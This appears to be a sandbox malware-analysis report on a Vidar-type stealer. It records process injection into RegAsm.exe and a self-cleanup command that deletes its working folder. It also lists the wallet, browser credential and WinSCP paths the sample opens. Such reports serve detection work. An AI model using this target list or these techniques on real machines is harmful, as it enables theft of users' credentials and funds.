            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: sysadmin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: sysadmin.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: sysadmin.exeStatic file information: File size 1662464 > 1048576
            Source: sysadmin.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x18fe00
            Source: sysadmin.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: sysadmin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: k.pdb~ source: sysadmin.exe, 00000000.00000002.1727202980.000001A6BE2A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\Administrator\Desktop\HeliosDisplayManagement-master\Release\HeliosDisplayManagement.pdb source: sysadmin.exe
            Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: sysadmin.exe
            Source: Binary string: k.pdb source: sysadmin.exe, 00000000.00000002.1727202980.000001A6BE2A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.pdb source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: sysadmin.exe
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.pdbhPj source: sysadmin.exe, 00000000.00000002.1727704147.000001A6BFDE1000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline"
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeCode function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004487CF push eax; ret 4_2_004487D0
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.dllJump to dropped file
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory allocated: 1A6BFBE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory allocated: 1A6D7DE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.dllJump to dropped file
            Source: C:\Users\user\Desktop\sysadmin.exe TID: 7284Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exe TID: 8016Thread sleep count: 91 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041008C FindFirstFileA,4_2_0041008C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00428248 FindFirstFileA,memset,memset,4_2_00428248
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042A4E5 FindFirstFileA,4_2_0042A4E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040E749 FindFirstFileA,4_2_0040E749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040177C FindFirstFileA,4_2_0040177C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00412AC9 FindFirstFileA,4_2_00412AC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040CCEA FindFirstFileA,4_2_0040CCEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042BD1E FindFirstFileA,4_2_0042BD1E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004018DA FindFirstFileA,4_2_004018DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00428DDA GetLogicalDriveStringsA,4_2_00428DDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F9A3 GetSystemInfo,4_2_0041F9A3
            Source: C:\Users\user\Desktop\sysadmin.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: RegAsm.exe, 00000004.00000002.2326300470.0000000003C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: sysadmin.exe, 00000000.00000002.1727202980.000001A6BE2F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2322975178.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\sysadmin.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 447000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 455000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 457000Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CBF008Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8D13.tmp" "c:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3wtj5" & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,4_2_0041F6B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\sysadmin.exeQueries volume information: C:\Users\user\Desktop\sysadmin.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042D98B EntryPoint,GetUserNameW,4_2_0042D98B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F53D GetTimeZoneInformation,4_2_0041F53D
            Source: C:\Users\user\Desktop\sysadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodus
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MultiDoge
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: RegAsm.exe, 00000004.00000002.2322975178.0000000000EDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Tries to harvest and steal Bitcoin Wallet information
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
